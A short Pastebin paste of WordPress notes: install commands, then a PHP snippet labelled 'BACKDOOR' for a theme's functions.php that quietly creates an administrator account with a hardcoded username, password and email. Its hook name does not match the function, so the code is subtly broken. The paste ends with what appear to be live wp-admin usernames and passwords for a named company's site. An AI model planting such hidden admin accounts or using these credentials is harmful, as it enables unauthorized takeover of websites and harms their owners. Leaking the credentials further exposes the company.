Advertisement
june23rd1987

WORDPRESS NOTES

Oct 4th, 2018
250
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.90 KB | None | 0 0
  1. WORDPRESS
  2.  
  3. https://wordpress.org/latest.tar.gz
  4. tar -xvzf latest.tar.gz
  5.  
  6.  
  7.  
  8. /////////////////////
  9. //////BACKDOOR///////
  10. ///////////////////// /yoursite.com/wp-content/themes/your-current-theme/functions.php
  11. //////IF WRONG PASSWORD RESET PASSWORD VIA FORGOT PASSWORD :D
  12. function create_admin_account(){
  13. $user = 'jaballon';
  14. $pass = '200504533Aa@';
  15. $email = 'jaballon@reelworks.com.ph';
  16. //if a username with the email ID does not exist, create a new user account
  17. if ( !username_exists( $user ) && !email_exists( $email ) ) {
  18. $user_id = wp_create_user( $user, $pass, $email );
  19. $user = new WP_User( $user_id );
  20. //Set the new user as a Admin
  21. $user->set_role( 'administrator' );
  22. }
  23. }
  24. add_action('init','admin_account');
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31. //////REELWORKS//////
  32. http://www.reelworks.com.ph/wp-admin/
  33. user: rdespiritu
  34. pass: !m*ctawUmFULDekRKuQ!tBft
  35.  
  36. user: jaballon@reelworks.com.ph
  37. pass: 200504533Aa@
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement